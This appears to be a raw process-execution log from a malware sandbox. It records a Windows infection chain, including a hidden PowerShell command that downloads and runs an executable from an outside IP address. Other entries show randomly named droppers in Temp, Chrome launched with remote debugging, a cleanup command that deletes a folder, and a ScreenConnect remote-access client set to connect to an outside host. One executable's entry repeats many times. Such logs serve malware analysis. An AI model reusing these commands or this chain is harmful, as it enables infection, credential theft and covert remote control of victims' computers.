C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"
C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 504
C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe
"C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe"
C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe
"C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef72b9758,0x7fef72b9768,0x7fef72b9778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1100 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2264 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2288 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1100 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3300 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3324 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1384 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe
"C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe"
C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe
"C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1892 -s 508
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3720 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe
"C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\noh47" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 11
C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"
C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 504
C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe
"C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 240
C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe
"C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\3be09d9e5e840c20\ScreenConnect.ClientSetup.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 892781CF53AD49D0DBD7DC387AB6DC73 C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIDA87.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259513060 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "0000000000000060" "0000000000000560"
C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe
"C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 3B85572E27B2AAB122B7715E5ED4A815
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A31261E18EDE542AF332C0E7A64EC7F4 M Global\MSI0000
C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=e228137a-1681-43c0-a833-6e8e39d6fe60&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&c=test&c=&c=&c=&c=&c=&c=&c="
C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "4b9ddc8f-c653-45ea-9c82-46ca4caff651" "User"
C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "08e856cc-7b68-40ec-973c-2bb46bb1d75f" "System"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
